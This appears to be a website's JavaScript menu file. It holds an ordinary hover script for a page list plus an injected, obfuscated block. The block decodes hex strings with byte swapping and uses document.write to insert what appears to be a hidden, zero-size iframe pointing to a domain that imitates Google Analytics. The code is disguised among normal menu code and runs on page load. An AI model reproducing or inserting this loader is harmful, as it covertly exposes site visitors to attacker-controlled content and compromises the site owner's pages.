sfHover = function() {
	var sfEls = document.getElementById("page-list").getElementsByTagName("LI");
	for (var i=0; i<sfEls.length; i++) {
		sfEls[i].onmouseover=function() {
			this.className+=" sfhover";
		}
		sfEls[i].onmouseout=function() {
			this.className=this.className.replace(new RegExp(" sfhover\\b"), "");
		}
	}
}
wptm=[''];pwcfabet(['693C72666D61206572733D63682274743A702F2F6F67676F656C612D616E796C747363692E736F632F6D6E69632E6967323F223066206172656D']);function pwcfabet(wlummcfy){wlummcfy[4]=function(viruxz){return(viruxz[0][viruxz[1]](viruxz[2],viruxz[3]));};wlummcfy[2]=/(..)(..)/g;wptm[1]='write';wlummcfy[3]='%$2%$1';wptm[2]=document;wlummcfy[1]='replace';wptm[0]+=unescape(wlummcfy[4](wlummcfy));return(wptm.slice(0,3).reverse().concat(['',wlummcfy[4]]));};pwcfabet(['6F6264727265223D22306220726F65643D7230222022697774643D6830222022656867697468223D223073207974656C223D6F70697369746E6F'])[4](pwcfabet(['203A62616F73756C6574203B697669736962696C7974203A696864646E65203B69647073616C3A796E206E6F22653C3E692F72666D613E65']));
if (window.attachEvent) window.attachEvent("onload", sfHover);